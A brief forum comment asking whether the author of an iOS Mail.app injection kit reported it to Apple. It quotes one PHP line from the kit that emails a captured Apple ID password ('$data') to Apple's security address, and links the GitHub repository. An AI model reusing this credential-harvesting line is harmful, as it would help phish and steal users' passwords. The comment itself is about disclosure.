Did this guy e-mail Apple product security?
It sounds like this guy may have skipped the threatening step and just went public.
"mail('product-security@apple.com','Apple ID Password',"Thanks for your password! \n $data ¯\_(ツ)_/¯ \n https://github.com/jansoucek/iOS-Mail.app-inject-kit");"
[1]: https://github.com/jansoucek/iOS-Mail.app-inject-kit/blob/ma...